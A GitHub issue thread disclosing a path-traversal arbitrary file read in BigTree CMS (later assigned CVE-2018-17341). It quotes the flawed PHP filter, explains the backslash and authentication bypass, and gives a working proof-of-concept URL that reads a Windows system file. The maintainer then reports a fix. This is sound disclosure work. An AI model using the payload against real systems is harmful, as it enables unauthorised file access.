Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Arbitrary file read #345

Closed
pupiles opened this issue Sep 22, 2018 · 2 comments
Closed

Arbitrary file read #345

pupiles opened this issue Sep 22, 2018 · 2 comments

Comments

@pupiles
Copy link

pupiles commented Sep 22, 2018

when we use "Advanced" or "Simple Rewrite" routing
in launch.php line 28-42

        if (!isset($_GET["bigtree_htaccess_url"])) {
            $_GET["bigtree_htaccess_url"] = "";
        }

        $bigtree["path"] = explode("/",rtrim($_GET["bigtree_htaccess_url"],"/"));
        $bigtree["trailing_slash_present"] = (substr($_GET["bigtree_htaccess_url"],-1,1) === "/");
    }

    // Prevent path manipulations
    $bigtree["path"] = array_filter($bigtree["path"],function($val) {
        if ($val == "..") {
            die();
        }
        return true;
    });

althouch .. has been baned,we can use ..\..\..\..\ bypass in windows
and the we can control the path in core\admin\router.php line 26

    $image_file = EXTENSION_ROOT."images/$image_path";

and we do not need Authenticated
in launch.php line 55

if (count($bigtree["path"]) < count($parts_of_admin)) {
        $in_admin = false;
    }

if count($bigtree["path"]>=count($parts_of_admin) we can bypass Authenticated

payload:

http://127.0.0.1/BigTree-CMS/core/launch.php?bigtree_htacess_url=admin/images/..\..\..\..\..\..\..\..\..\..\C:\windows\win.ini
timbuckingham added a commit that referenced this issue Sep 27, 2018
timbuckingham added a commit that referenced this issue Sep 27, 2018
timbuckingham added a commit that referenced this issue Sep 27, 2018
@timbuckingham
Copy link
Collaborator

Thanks! This should be fixed in all the current development branches for the next releases.

@fgeek
Copy link

fgeek commented Dec 25, 2018

CVE-2018-17341 has been assigned for this vulnerability.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants